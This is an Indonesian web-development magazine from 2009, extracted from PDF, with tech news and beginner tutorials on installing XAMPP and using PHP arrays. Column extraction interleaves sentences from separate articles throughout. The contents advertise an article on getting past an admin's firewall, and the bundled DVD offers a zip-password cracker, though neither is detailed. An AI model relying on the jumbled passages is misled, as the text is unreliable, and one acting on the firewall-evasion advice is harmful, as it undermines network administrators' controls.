Anda di halaman 1dari 65

Edisi Perdana 2009 . ILMUWEBSITE MAGZ http://www.ilmuwebsite.

com
PER
DA
NA
; IL
MU
WE
BS
IT E.M
A GZ

maga zine
MAJALAH for web developer, web designer, graphic designer, etc, from beginner to advanced ...

HIGHLIGHT SOFTWARE
Bahas Tuntas:
Koleksi ANTI VIRUS

SoftwarePortable
dari
Avira Antivir Personal
Libas virus import maupun lokal.

BerbagaiKategori
Membahas Tuntas Berbagai Software Portable dari berbagai kategori, penjelasan singkat mengenai
PCMAV 1.9 + ClamAV
Engine gabungan, menghancurkan virus lokal maupun import

penggunaan software portable, dilengkapi dengan aplikasi pendukung di dalamnya, dan segudang link
softtware yang dapat anda unduh secara gratis di Internet.
hal>39
OFFICE
Tips dan Trik openOffice.org 3
Cara Gampang
Aplikasi alternatif office yang dapat di gunakan sehari-hari ...
Microsoft

Rakit Aplikasi Portable


xp
Windows
Professional
Langkah mudah dalam merakit aplikasi portable sendiri ...
hal>54 GRAPHIC DESIGN & MULTIMEDIA
Web Project Blender 3D
Senjata pamungkas 3D Modeler...
Membuat e-commerce dengan PHP Inkscape
Langkah mudah membangun e-commerce dengan php, mulai dari perancangan database
Alternatif Coreldraw, ringan namun memiliki fitur yang powerfull
hingga pembuatan script sederhana e-commerce.
hal>13 The Gimp
Alternatif Photoshop, layak untuk digunakan sehari-hari
Pengenalan
Internet Marketing
Langkah awal membangun dunia bisnis di Internet.
hal>10
DEVELOPER TOOLS
Fotografi
Mengenal Kamera nVU
Senjata pamungkas web developer...
Langkah awal menjadi photografer profesional. Ketahui
penggunaan kamera dan teknik pengambilan gambar
hal>36 XAMPP WebServer Potable
Webserver portable ringan yang mudah dibawa ...

DVD Berisi Kumpulan ...


Software Portable dari Berbagai Kategori :
xampp lite, gimpshop, opera, winrar portable, driver detective,
pdf2office, typing master demo portable etc...
distributed by : lapak-online.com
Ilmuwebsite Magazine : maga zine

Majalah pertama
ZINE STAFF
Web development
CHIEF

Y a, majalah ilmuwebsite ini sengaja kami susun sebagai


pemenuh kebutuhan para web developer Indonesia yang haus
akan ilmu per-website-an, mulai dari perancangan sistem
hingga develop sistem.
Di edisi perdana ini, sengaja kami coba membawakan satu topik
Loka Dwiartara

EDITOR
Pietra Kharisma
familiar yang populer, yang tentunya menjadi kebutuhan para user
yang haus akan ilmu seputar bidang teknologi informasi, atau sekedar CONTRIBUTOR
memenuhi kebutuhan sehari-hari, dalam ruang lingkup skala kecil Anggi Jatrasmara, Loka Dwiartara,
hingga yang bersakala besar. Yogi Wicaksono, Ivan Yudianto, Briliant,
Ada 2 konten pembahasan dalam majalah ilmuwebsite ini, Satya Danu, Syahril Rohman, Hairul Azami,
pertama adalah other content, membahas semua yang berbau portable M. Tovan Satria Putra,
software, didalamnya kami akan mencoba menjelaskan aplikasi- Hartono Gunawan, Kandar
aplikasi portable dari berbagai kategori, cara pembuatan aplikasi
portable tersebut, hingga meracik sendiri sistem operasi yang LAYOUT & DESIGN
portable. Sedangkan konten yang kedua adalah web content. Untuk
Deny Sarwono
edisi perdana, pembahasannya meliputi web development dari tingkat
yang beginner hingga tingkat menengah, mulai dari pengenalan cms,
proses installasi cms, pengenalan server scripting, hingga internet MARKETING
marketing. Lapak-Online Corporation
Dengan harapan majalah ini dapat memenuhi kebutuhan para web
developer pemula, hingga internet mareketer yang baru akan PRODUCTIONS
menjejakkan kakinya untuk memulai bisnis internet. Akhir kata kami Lapak-Online Corporation
ucapkan selamat menjelajahi majalah ilmuwebsite, persembahan
kami, untuk anda, pembaca setia, dan pengunjung ilmuwebsite e-
learning community. Salam.

Loka Dwiartara::Ilmuwebsite Staff

Redaksi : red.magz@ilmuwebsite.com
Telp : 02519388955 ( Bogor ) 085648173225 ( Sidoarjo ) ilmuwebsite magazine, majalah khusus
Website : http://magz.ilmuwebsite.com web development, melakukan pembahasan
secara terperinci mengenai pembuatan
aplikasi dan sistem informasi berbasis web,

WEBSITE
.daftar .ilmuwebsite
.magazine e-learning community offline version
isi zine

ilmuwebsite magazine
Daftar Isi
No.1-2009

39
Koleksi
Software
Portable
Topik utama kali ini membahas aplikasi portable
populer yang sering kali digunakan oleh
pc mania dalam berkomputer ria.
Simak ulasan lengkapnya...

Overview Flash
di Dunia Maya 31
Peran flash dalam dunia web
development begitu penting,
Server Scripting
6 Pengenalan PHP dan MySQL
Dua pasangan ini hampir dapat
dikatakan mendominasi dunia
web development. Kami coba
dalam menghasilkan web yang membahasnya secara terperinci.
dynamis dan attraktif... 8 Mengenal array

Content Management System


16 Mengenal Content Management
System
Apa itu content management
system ? Dan bagaimana
perkembangannya di dunia web
development ? Ikuti selengkapnya
21 Langkah Mudah Installasi Joomla

28
Tutorial Desain Grafis:
Web Security
Membuat 3D Cube
27 Bot Filter, jadikan site anda
dengan Adobe photoshop CS hanya untuk manusia saja!
dr.emi ( dremi.info ) mencoba memberikan sebuah tutorial Spamming kerapkali menjadi cara
yang benar-benar memikat dalam menghasilkan objek 3D dari tersendiri untuk mengiklankan
shaping sederhana 2D ... produk bagi beberapa perusahaan.
Tentunya ini sangat mengganggu.

Teknik Fotografi

10 Internet Marketing dan SEO :


Pengertian Internet Marketing
Bagaimana memasarkan produk
36 Mengenal Kamera DSLR
Penguasaan DSLR konon katanya
dan jasa anda memanfaatkan fasilitas merupakan digitalisasi SLR
search engine. Di sinilah semua tetap menjadi syarat mutlak untuk
itu berawal. memperoleh hasil maksimal

.ilmuwebsite magazine | perdana 2009


.ilmuwebsite .daftar
e-learning community offline version .magazine isi zine

News Software Networking


3 ITB Kembangkan Pengendali 49 Active Password Changer 56 Melewati Firewall Admin
Komputer Pakai Otak Professional v3 yang memblocking akses
Chatting
Fitur baru google talk, video Thinstal v.3.387
Kesal memang jika untuk
dan voice support untuk
Recosoft PDF2Office berchatting ria pun aksesnya
gmail system
Professional 4.0 dibatasi oleh admin jaringan.
Kini Kaskus LebihKaya Inovasi Di sini akan dijelaskan bagaimana
Indonesian Security Conference Tips Trik Web & Aplikasi teknik untuk mengelabuinya

Sun Rilis JavaFX, Bersaing 50 Konversi file excel menjadi mysql 57 Menjalankan Program
dengan Flash & Silverlight Mengambil data untuk dijadikan secara Remote dalam satu
database tentunya teramat rumit Networking
Simulasi Dunia Virtual
Muslim Pertama jika dilakukan secara manual. 58 Memanfaatkan teknologi
Berikut adalah tips trik untuk Virtual Private Server
Facebook Connect & Google mengkonversi excel menjadi mysql VPS adalah teknologi yang
Friend Connect menggunakan XML dom dan PHP. telah sejak lama ada. Namun
Israel Buat Situs Tentang Alquran bagaimana memanfaatkan VPS
53 Tips dan Trik WinRAR dalam memperlancar bisnis anda
Beberapa tips menarik winrar.
di internet.
54 Membuat Aplikasi portable
Web Project dengan Thinstall
Info Harga
13 Langkah Awal Pembuatan Tidak puas dengan aplikasi portable
E-Commerce dengan PHP (Bag 1) yang sudah ada ? Anda dapat
60 Info Harga Hardware
dan Accesories
Penjualan produk di internet telah membuatnya sendiri.
banyak yang menggunakan
fasilitas dari CMS yang Linux
dikhususkan untuk e-commerce. Menginstall xAMPP di linux
Artikel kali ini mengajak anda xAMPP telah terbukti benar-benar
untuk membuat sendiri paket web server yang benar-benar
e-commerce dengan logika yang handal. Bagaimanakah menginstall
sederhana menggunakan PHP. xampp dilinux ?

Daftar isi CD
ilmuwebsite zine

game graphic design


glest 3.1.2 Blender 3D 2.48a Lebih dari 90 Aplikasi Koleksi
widelands build 12 Inkscape Inkscape-0.46
The Gimp 2.6.4
Software Portable
utility dariBerbagai
Active Password Changer v3.5 multimedia
Driver Detective 6.2.5.0 Cinelerra
Kategori
MProjector.v3.1.1b
Notepad++ 4.3 developer
Smart Data Recovery nVU
Ultimate Zip Cracker 7.3.2.3 XAMPP Lite
PDF2Office Pro 4.0
Thinstall3 387 antivirus
PCMAV 1.91 + ClamAV
office Avira Antivir Personal 8
openOffice.org 3 Kaspersky Security 2009

.ilmuwebsite magazine | perdana 2009


.news .ilmuwebsite
.magazine e-learning community offline version

ITB kembangakan
pengendali komputer
3 pakai pikiran

fitur baru google talk


video dan voice support
untuk gmail system

Kini kaskus lebih kaya


4 inovasi

indonesian security
conference 208

Sun Rilis JavaFX,


Bersaing dengan Flash
& Silverlight ITB Kembangkan Pengendali
Komputer Pakai Pikiran
ITB tengah mengembangkan pengendali dalam bereaksi terhadap suatu kondisi dibaca
Simulasi Dunia Virtual komputer dengan menggunakan otak manusia. oleh Teknologi Brain Computer Interface. Sinyal
Muslim Pertama Otak manusia menghasilkan gelombang alpha gelombang analog ini kemudian dikonversi ke
saat berkonsentrasi yang bisa diterjemahkan biner untuk mengendalikan suatu objek di
kedalam sinyal digital. komputer tanpa menggunakan alat apapun.
Penelitian untuk mewujudkan pengoperasian Simulasi pembacaan perintah otak ini diuji coba
5 Facebook connect & komputer dengan cara menangkap sinyal-sinyal dengan memasangkan suatu alat pendeteksi
google friend connect dari otak, sudah dilakukan tim reaserch Sekolah gelombang alpha pada kepala.
Teknik Elektro dan Informatika (STEI) ITB. Tim ini Alat yang menggunakan sumber arus DC yang
terdiri dari Mahasiswa-mahasiswa S2 yang terukur, dikoneksikan ke komputer, dimana
tergabung dalam grup riset bernama Digital pengunjung mencoba untuk menggerakkan
Israel buat situs Media and Game Center. Awal penelitian mereka suatu balok dari suatu tempat ke tempat lainnya
tentang Alquran
lebih fokus untuk mengembangkan aplikasi- hanya dengan memikirkannya dalam otak. Dan
aplikasi yang sebagian besar berupa game ternyata objek-objek tersebut memang bergerak
edukasi. menurut keinginan pengunjung.
Sinyal gelombang Alpha yang dihasilkan otak [Sumber : detik.com]

Fitur baru Google talk,


video dan voice support untuk
.news

gmail system
Bagi anda yang senantiasa memanfaatkan video dan suara untuk sementara ini hanya dapat
fasilitas dari google, begitu juga dengan anda di gunakan dalam google talk service yang
yang chatting mania pastilah familiar dengan berada dalam gmail system, sedangkan aplikasi
aplikasi instan messaging seperti google talk. google talk client untuk versi windowsnya belum
Google talk merupakan service yang disediakan mensupport fasilitas video chat tersebut.
untuk dapat digunakan secara langsung dalam Fitur terbaru dari google talk merupakan tools
fasilitas gmail system, maupun digunakan yang fantastis, seseorang dapat menggunakan
terpisah, dengan aplikasi google talk client. Kabar fasilitas video chat dengan keluarga, teman, dan
gembira dari penambahan fitur yang dilakukan koleganya secara cepat hanya dengan
oleh google saat ini adalah user dapat melakukan menggunakan browser internet. Bagaimanapun
voice dan video chat dalam service gmail hanya juga penambahan fasilitas video dan voice chat
dengan menggunakan browser internet, tentunya secara bertahap akan membuat google talk
setelah user mendownload Google provided menjadi instan messaging yang powerfull. Kita
plugin. tunggu saja versi finalnya! :D
Ya perlu diketahui, fasilitas chat menggunakan [ Sumber: cmswire.com ]

3 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite
e-learning community offline version .magazine .news

Kini Kaskus Lebih Indonesian Security Sun Rilis JavaFX, Bersaing


Kaya Inovasi Conference 2008 dengan Flash & Silverlight
Forum komunitas terbesar di Indonesia, Pada tanggal 13-14 Sun telah secara resmi meluncurkan JavaFX
Kaskus, mencoba terus eksis dan Desember kemarin, telah 1.0, sebuah framework pengembangan Rich
berkembang, dengan tampilan serta fitur-fitur diadakan agenda tentang Internet Application (RIA) berbasiskan
yang memanjakan Kaskuser (sebutan bagi konfrensi IT Indonesia platform Java. Melalui JavaFX Sun berharap
pengguna Kaskus) Sejak soft launching pada yang bernama dapat kembali mendorong popularitas Java
17 Agustus lalu, Kaskus telah berkembang Indonesian Security Conference 2008 atau dan bersaing dengan Flash dan Silverlight.
pesat. Saat ini Kaskus memiliki 700 ribu yang lebih dikenalIDSECCONF2008. Ini JavaFX menawarkan dua janji besar:
member, dengan 8,8 juta unique IP visitor per merupakan . konfrensi pertama yang 1. Menjadi pondasi untuk mengoperasikan
bulannya. Tercatat ada 10 ribu Kaskuser setia melibatkan sebagian besar komunitas rich internet applications dengan tampilan
yang hadir setiap harinya. keamanan IT di Indonesia. menawan
"Tampilan Kaskus lebih komplit, dengan fitur- Acara ini diadakan di Yogakartnya bertempat 2. Bahasa pemrograman baru bernama
di UPN Veteran Yogyakarta didukung oleh JavaFX script yang dirancang untuk lebih
Departemen Komunikasi dan Informasi RI mudah daripada Java tradisional.
dan berbagai sponsor lainnya.
Tujuan dari acara ini adalah untuk Sun pertama kali memperkenalkan JavaFX di
memberikan pengetahuan kepada khalayak konferensi JavaOne tahun lalu. Sejak saat itu
ramai, pelajar mahasiswa, ataupun kalangan Sun telah meningkatkan teknologi tersebut
praktisi security professional khususnya secara signifikan dan memperkenalkan
mengenai berbagai isu keamanan yang ada. beberapa fitur baru. Salah satunya adalah
Kegiatan yang berfokus pada masalah TI memungkinkan pengguna untuk membawa
khususnya keamanan teknologi informasi dan applet JavaFX dari dalam browser ke desktop
fitur baru serta menciptakan suasanan fun, temu komunitas ini akan di isi dengan sehingga dapat dipakai tanpa browser.
ketika Kaskuser sedang online. Kategori kegiatan seminar beberapa acara tentang
komunitas lebih apik dan dikelompokkan keamanan teknologi dan hal-hal yang berbau
berdasarkan interest anggotanya," ungkap IT dan keamanannya.Hari pertama di isi
Andrew Darwis, pendiri Kaskus, di Hotel dengan seminar salah satunya dengan
Indonesia Kempinski, Jakarta, Rabu bahasan tentang windows hacking dan social
(3/12/2008). enggineering. Di isi oleh 6 pemateri kalangan
Beberapa hal yang sudah dilakukan antara IT seperti y3dips dan k-159.
l a i n m e n y e d i a k a n a p l i k a s i W A P, Hari kedua di isi dengan diskusi panel yang
menghadirkan kontributor ahli pada forum mengambil tema "Menyongsong IT di Sun telah mengintegrasikan JavaFX secara
tertentu, menambah sub forum, mendesain PEMILU 2009", para panelisnya dari penuh ke dalam Java RunTime dan
ulang tampilan Forum Jual Beli, sampai kalangan yang berlatar belakang beragam, mendorong instalasi JavaFX kepada
dengan program Kaskus Peduli. Kini, dengan diantaranya dari pihak KPU, praktisi pengguna secara aktif melalui Java update
mengklik www.m.kaskus.us, user bisa pendidikan, perwakilan komiteidsecconf2008 system. Langkah ini memungkinkan Sun
mengakses Kaskus di manapun berada dan masyarakat umum. untuk memanfaatkan jumlah pengguna Java
melalui ponselnya.Menutup akhir tahun 2008 IDSECCONF2008 ini adalah cerminan upaya yang besar untuk mendorong komponen
ini, Kaskus resmi meluncurkan 9 komunitas yang diberikan komunitas non- profit JavaFX yang baru kepada pengguna.
baru, yang terdiri, BlackBerry Corner, khususnya untuk kemajuan pendidikan anak Saat ini JavaFX hanya tersedia untuk
Lowongan Kerja, Saham, Bisnis dan bangsa serta sebagai salah satu upaya untuk Windows dan Mac OS X. Sun masih belum
Investasi, Fitness Supelement, Gadget, Audio mempercepat penyebaran ilmu Teknologi mengatakan kapan JavaFX akan tersedia
Video, Grappling, serta Event dan Promosi. Informasi di berbagai kalangan. untuk pengguna Linux.
[Sumber : techno.okezone.com] [Sumber : jasakom.com] [Sumber : udaramaya.com]

Simulasi Dunia Virtual Muslim Pertama


Sebuah game tersebut. Hampir mirip dengan simulasi mendorong pengertian di kalangan non-
dunia virtual bagi dunia virtual seperti The Sims, Muxlim Pal muslims.
komunitas membuat para pemain dapat mengatur dan "Situs online kami bukanlah situs religius,
muslim baru saja memilih sendiri tampilan avatar serta ruang Kami adalah pengelola situs yang fokus
diluncurkan. pribadinya. Bahkan di ruang pribadi, game ini pada gaya hidup, "ujar Mohamed El-Fatatry,
Masih dalam memungkinkan tokoh memiliki sajadah dan pendiri Muxlim.com, situs induk dari Muxlim
versi percobaan, ruang untuk beribadah. Bisa dibilang Muxlim Pal."Ini untuk orang-orang yang khusus
Tampilan simulasi
permainan Pal adalah debutan dalam Islamogaming tertarik terhadap budaya muslim dan gaya
simulasi digital bernama Muxlim Pal, berkategori simulasi dunia virtual. Ditujukan hidup muslim," ungkap Mohamed lagi seperti
memungkinan pemain 'merawat' tokoh bagi muslim di negara Barat, pencipta yang dikutip oleh situs berita BBC.
avatar kartun yang tinggal di dunia virtual Muxlim Pal berharap game-nya juga [Sumber : republika.co.id]

.ilmuwebsite magazine | perdana 2009 4


.news .ilmuwebsite
.magazine e-learning community offline version

Facebook Connect & Google Friend Connect

M
inggu ini (06/12/2008) adalah minggu bersejarah untuk web 2. Memudahkan pengguna untuk berbagi pengalaman web dengan
di mana dua raksasa internet merilis dua solusi yang teman-temannya
berpotensi mengubah seluruh internet menjadi situs jejaring
sosial raksasa. Facebook merilis Facebook Connect sedangkan Keunggulan dari menggunakan Facebook Connect saat ini adalah
Google merilis Google Friend Connect, kedua-duanya memungkinkan pemilik situs dapat menggunakan data hubungan teman yang sudah
situs pihak ketiga untuk menerima pengunjung yang sudah memiliki dimiliki pengunjung melalui Facebook, sedangkan Google Friend
akun Facebook dan Google tanpa perlu membuat akun baru khusus Connect mendukung lebih banyak jenis identitas online sekaligus
untuk situs tersebut. memungkinkan pemakai untuk menanamkan aplikasi Open Social di
situsnya.
Baik Google Friend Connect maupun Facebook Connect bertujuan
untuk mempromosikan penggunaan satu identitas digital di seluruh
web. Perbedaan utama dari kedua solusi ini adalah apabila Facebook
Connect hanya memungkinkan pengguna untuk login dengan akun
Facebook saja, sedangkan Google Friend Connect memungkinkan
pengguna untuk menggunakan akun Google, Yahoo, AOL atau OpenID
tanpa perlu membuat profil baru lagi di situs tujuan. Sebagai tambahan,
situs-situs yang menggunakan Friend Connect juga secara otomatis
mendapatkan kapabilitas untuk menggunakan aplikasi-aplikasi
OpenSocial, menjadikan situs mereka tempat yang lebih sosial.

Sedangkan untuk Facebook Connect, Secara garis besar Facebook


Connect memberikan dua keuntungan:
1. Memudahkan pengguna untuk menggunakan identitas tunggal di
web

Israel Buat Situs Tentang Alquran


S
etelah meluncurkan aplikasi Alquran untuk ponsel, kini
beberapa professor dan siswanya dari Univeristas di Israel
telah membuka situs yang berisi jawaban akan masalah
kehidupan dalam prespektif Alquran. Situs yang beralamat di
www.Quranet.net, dikelola secara penuh oleh Profesor Israel dan
muridnya. Situs yang mengusung tema Bridge Betwen Islam and the
West tersebut diharapkan bisa menjadi jembatan antara Islam dengan
dunia barat. Kami mencoba mentransformasikan Alquran dengan
kehidupan yang modern ini. Pasalnya ayat dalam Alquran dapat
memberikan jawaban tentang kehidupan," ujar Ofer Grosbrand, salah
satu pengajar di Academic Arab College yang telah barafiliasi dengan
Haifa University. "Situs ini ingin menjawab semua, khususnya yang
berkaitan dengan psikologi yang selama ini salah ditafsirkan, baik oleh
orang Arab, maupun dunia barat. Alquran itu datangnya dari Tuhan dan
tidak ada yang dapat membantahnya," tambah Grosbrand.
Meski bertujuan mulia, media barat menuding situs ini memiliki agenda
politik negara Israel. Pasalnya meski telah mempelajari Islam dan
Alquran, namun semua pengelola di situs ini mendapatkan pelajaran
tersebut dari Israel, bangsa yang selama ini mereka tuding telah
melakukan penindasan. Terlebih masih melakukan penjajahan
terhadap negeri Palestina.Dalam situs tersebut terdapat beberapa
nama tokoh Israel seperti Sheikh Musa Admani, sampai dengan
Profesor Yuli Tamir yang saat ini menjabat sebagai Menteri Pendidikan Tampilan situs tentang AL QURAN
Israel.

5 .ilmuwebsite magazine | perdana 2009


.server .ilmuwebsite
.magazine e-learning community offline version
scripting
Pengenalan PHP,
Apache, Mysql serta
6 cara instalasi

8 Mengenal aray Pengenalan PHP, Apache,


Mysql serta cara Installasi
PHP merupakan Server Side Scripting, dimana script tersebut hanya dapat
dieksekusi atau dijalankan di sisi server saja, berbeda halnya dengan Javascript
maupun VBScript yang dapat berjalan di sisi Client(Client Side Scripting).

Apa itu PHP php.ini. Ya, pertama kali php diperkenalkan oleh
PHP akronim dari “PHP: Hypertext Rasmus Lerdorf pada tahun 1995 untuk
.server scripting

Preprocessor” adalah bahasa pemrogamman keperluan dinamisasi website pribadinya, saat


yang cenderung sederhana dan mudah untuk ini PHP telah berkembang dengan pesatnya
dipahami. Saat ini PHP banyak sekali guna mengembangkan website yang ada.PHP
dimanfaatkan dalam pengembangan sistem merupakan bahasa yang open source, anda
informasi, tidak hanya mencakup website bebas menggunakannya ataupun
dinamis saja, tetapi para web developer mengembangkannya, untuk mendapatkan
sekarang banyak memanfaatkan bahasa source code atau library dari PHP tersebut
pemrogaman yang satu ini untuk silahkan anda kunjungi http://www.php.net,
mengembangkan aplikasi yang lebih besar lagi. sedangkan untuk menjadi bagian dari komunitas
Contoh aplikasi yang nyata misalnya “Microsoft pengguna PHP di Indonesia silahkan bergabung
Office Online”. PHP merupakan salah satu dengan milis phpug@yahoogroups.com.
komponen yang melengkapi pengembangan
aplikasi berbasis website tersebut. Namun Database, jika mendengar kalimat tersebut
sebelum melanjutkan khayalan kita untuk secara spontan yang terdapat dalam benak kita
membuat suatu aplikasi yang kompleks, saya adalah sebuah tempat data yang sangat banyak,
akan coba mengenalkan struktur pemrogaman dimana data-data tersebut biasanya terintegrasi
php terlebih dahulu. antara satu sama lain. Mysql merupakan suatu
Database Server yang sangat handal dan
<html> ringan, juga sangat compatible dengan bahasa
<head> server scripting seperti PHP, karena kecocokan
<title>awal pemrograman PHP saya </title> tersebut seringkali mysql dijadikan sebagai
</head> database yang memenuhi scripting pada php,
<?php hingga saat ini telah banyak jasa web hosting
echo "Haloo Aku adalah Script PHP"; yang telah mensupport hostingnya dengan
?> bahasa pemrogaman PHP dan database
<Body> MySQL. Mysql telah terbukti sangat cocok untuk
</body> dunia web programming dikarenakan fiturnya
</Html> yang ringan dan juga open source, anda dapat
mendownloadnya secara free alias gratis,
Bahasa PHP selalu diawali dengan tanda <? bahkan setiap pengguna Mysql diizinkan untuk
Atau <?php dan di akhiri ?>, seperti yang telah mengubah source code untuk keperluan
saya contohkan diatas, akan tetapi untuk pengembangan lebih lanjut
mengawali script php anda juga dapat
menggunakan <% di awal dan %> di bagian Berikut ini adalah beberapa keunggulan dari
akhirnya, akan tetapi sebelum dapat MySql Database Server :
menggunakannya, terlebih dahulu harus
merubah konfigurasi php yang terdapat dalam Mampu menangani jutaan user dalam waktu
?

6 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite .Server
e-learning community offline version .magazine
scripting

yang bersamaan, Di sana terlihat service apache sebagai web diembededkan 1 bundel PHP, Mysql dan
? Mampu menampung lebih dari 50.000.000 server telah berjalan secara background, Apache :
record, diwakili dengan kata “Started”. Namun bukan
? Memiliki fasilitas user Previlege system atau hanya apache saja yang dapat digunakan -XAMPP dapat download di
Hak akses user yang sangat mudah dan sebagai Web Server, PHP pun dapat http://www.apachefriends.org/en/xampp.htm
efisien, dikolaborasikan dengan IIS (Intenet l
? Sangat cepat dalam melakukan eksekusi Information Service) milik Microsoft, -WAMP dapat di download di
query. OmniSecure dan masih banyak lagi web http://www.wampserver.com/en/download.php
server yang compatible dengan PHP, pilihan
Dengan berbagai alasan, Mysql saat ini telah bergantung pada anda. :) -PHP Triad dapat download di
begitu banyak digunakan sebagai database http://sourceforge.net/projects/phptriad
server di internet, Untuk menginstall services Untuk mendapatkan apache web server anda
Mysql ini, anda dapat mendownload file dapat download melalui -REACTOR SERVER dapat download di
http://www.reactorserver.com/downloads-
installasinya di http://www.mysql.com http://www.apache.org. cat1.html.

Untuk dapat menjalankan script PHP, berikut Installasi PHP, Mysql dan Apache Selanjutnya penulis akan mencoba
database Mysql yang berada didalamnya pada Windows menjelaskan proses installasi dengan salah
satu paket yang sering digunakan oleh web
dibutuhkan suatu Web Server atau dikenal Agar dapat menjalankan PHP, Mysql dan developer kebanyakan, yakni Xampp.
dengan HTTPD (Hypertext Transfer Protocol apache secara bersamaan sebenarnya ada
Daemon) misalnya web server Apache. beberapa cara yang dapat dilakukan, yaitu Pertama-tama siapkan paket yang sudah
Disebut sebagai daemon ini, karena Web pertama anda dapat menginstallnya satu anda download, jika belum ada, penulis sudah
menyiapkannya dalam dvd ilmuwebsite
server adalah sebuah service yang berjalan persatu paket-paket yang dibutuhkan, opsi
magazine perdana ini, langkah selanjutnya
secara background, tidak kelihatan tetapi yang lainnya adalah anda dapat menginstall adalah jalankan installer tersebut.
prosesnya ada, untuk melihat service apa P H P, M y s q l d a n A p a c h e d e n g a n Kemudian klik Next….
saja yang berjalan di computer kita : menggunakan satu paket lengkap yang di
Masuk ke menu start | Run ketik dalamnya telah terinstall PHP, Mysql
services.msc database, dan Apache web server, tidak
hanya itu tapi juga paket-paket aplikasi
tambahan lainnya seperti PHPMyAdmin yang
nantinya dapat digunakan sebagai
manajemen database mysql berbasis
website. Dan juga masih banyak fitur-fitur
lainnya yang tentunya fitur tersebut sesuai
dengan paket bawaannya.

Selanjutnya silahkan pilih folder tujuan


Kemudian Enter, Maka akan muncul tampilan Berikut merupakan beberapa paket-paket
dimana akan diinstall paket xampp ini, anda
seperti di bawah ini: populer yang didalamnya telah dapat menginstall pada drive c, ataupun pada
drive d, ataupun drive-drive yang lain yang
ada dalam pc anda, jika sudah memilih
direktori tujuan penginstallan paket , klik Next.
Ketika tampilan seperti ini sebaiknya anda
memberi tanda ceklist pada install apache as
service dan install mysql as
service,Kemudian klik Next, lalu klik Install

.ilmuwebsite magazine | perdana 2009 7


.Server .ilmuwebsite
.magazine e-learning community offline version
scripting

selesai nantinya, kemudian klik Finish. Untuk selanjutnya, jika anda telah membuat
Sekarang anda sudah memiliki web server di satu script php, kemudian akan menjalankan
computer local milik anda. Pada paket yang
telah diinstall tersebut secara otomatis sudah script tersebut, tinggal simpan script tersebut
di-includekan PHP, MySQL, Apache dan juga ke dalam direktori C:\Program
PHPMyadmin. Files\xampp\htdocs, ini adalah direktori
Untuk mengetahui apakah webservernya default dari installasi xampp, direktori ini
sudah benar-benar berjalan, atau hanya disesuaikan dengan direktori yang anda isi
sekedar ingin mencoba script php yang telah pada waktu penginstallan paket xampp.
anda buat, silahkan jalankan browser internet Sekian dulu dari penulis. Akhir kata penulis
kesayangan anda, kemudian ketikkan ucapkan “Maju terus dunia IT Indonesia”.
Biarkan proses extract ini berlanjut hingga [Syahril]
http://localhost atau http://127.0.0.1.

Mengenal Array
Hampir di semua bahasa pemrograman mengenal adanya data array. Begitu pula dengan PHP. Berbeda dengan variabel pada
umumnya, variabel array bisa menyimpan lebih dari satu nilai

Array adalah sekumpulan objek dengan


atribut yang sama dimana masing-masing <?Php $Nama_warna[] = 'kuning';
objek tersebut bisa diakses satu-perstu. $nama_hari = array(“senin”, “selasa”, $nama_warna[] = 'hijau';
Sebagai contoh dari data array ini misalnya “rabu”, “kamis”, “jumat”, “sabtu”, “minggu”); $Nama_warna[] = 'biru';
nama-nama hari. Sebuah data array dengan $nama_warna[] = 'ungu';
nama “nama_hari” objeknya terdiri dari $nama_warna = array(“merah”, “kuning”, $nama_warna[] = 'jingga';
“senin”, “selasa”, “rabu”, “kamis”, “jumat”, “hijau”, “biru”, “ungu”, “jingga”); ?>
“sabtu”, “minggu”.
$nama_hewan = array(“kucing”, “kerbau”, Bagai mana caranya kita menampilkan atau
Mari kita terjemahkan contoh di atas kedalam “harimau”, “gajah”, “jerapah”); mencetak data di atas di dalam PHP? Kita
bahasa PHP. ?> bisa menggunakan fungsi print_r(). berikut ini
scriptnya:
<?php Selain cara di atas, kita juga bisa menciptakan
$nama_hari = array(“senin”, “selasa”, array dengan cara menginisialisasi setiap <?php
“rabu”, “kamis”, “jumat”, “sabtu”, “minggu”); data/objek satu persatu. Berikut adalah print_r($nama_warna);
?> contohnya:
/*
Sebagaimana kita lihat pada script di atas, <?php hasilnya adalah: Array ( [0] => merah [1] =>
variabel “nama_hari” memiliki tujuh nila yakni $nama_hari[] = 'senin'; kuning [2] => hijau [3] => biru [4] => ungu
nama-nama hari dalam seminggu. $nama_hari[] = 'selasa'; [5] => jingga )
$nama_hari[] = 'rabu';
Bagaimanakan membuat array? $nama_hari[] = 'kamis'; */
Ada beberapa cara dalam membuat array. $nama_hari[] = 'jumat';
Cara yang pertama adalah dengan $nama_hari[] = 'sabtu'; ?>
menginfentaris semua data yang kita inginkan $nama_hari[] = 'minggu';
dalam satu list yang sama. Hal ini telah kita $nama_warna[] = 'merah'; Kita juga bisa menggunakan fungsi var_dump
lakukan pada contoh script di atas. untuk menampilkan informasi lebih detail.

8 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite .Server
e-learning community offline version .magazine
scripting

dalam PHP terdiri dari dua jenis, yaitu key


<?php yang berupa integer dan key yang berupa <?php
var_dump($nama_warna); string. Jika kita menentukan key suatu array $warna_hari = array (“kuning”=>”senin”,
menggunakan data integer maka disebut “merah”=>”selasa”,
/* array indexed. Sedangkan jika kita “hijau”=>”rabu”,”jingga”=>”kamis”);
hasilnya adalah: array(6) { [0]=> string(5) menggunakan string sebagai key, maka ?>
"merah" [1]=> string(6) "kuning" [2]=> disebut array asosiatif.
string(5) "hijau" [3]=> string(4) "biru" [4]=> Atau bisa juga dengan cara berikut ini:
string(4) "ungu" [5]=> string(6) "jingga" } Berikut ini contoh membuat array dengan key
*/ yang kita tentukan: <?php
?> $warna_hari[“kuning”] = ”senin”;
<?Php $warna_hari[“merah”] = ”selasa”;
Sebagaimana telah kita lihat pada hasil cetak, $nama_hari = array(0=>“senin”, $warna_hari[ “hijau”] = ”rabu”;
selain menampilkan data berupa nilai yang 1=>“selasa”, 2=>“rabu”, 3=>“kamis”, $warna_hari[”jingga”] = ”kamis”;
telah kita tentukan, kita juga melihat adanya 4=>“jumat”, 5=> “sabtu”, 6=>“minggu”); ?>
nilai lain, yakni angka-angka yang mengawali
nilai kita. Dari manakah angka-angka ini? $nama_warna = array(2=>“merah”, Kita juga bisa menciptkan array secra cepat
3=>“kuning”, 4=>“hijau”,5=> “biru”, dengan fungsi range(). Dengan fungsi range
Selain terdiri dari nilai (value) array juga 6=>“ungu”, 7=>“jingga”); ini key yang dihasilkan merupakan data
mengandung key. Key merupakan element ?> integer atau berurutan. Urutannya bisa dari
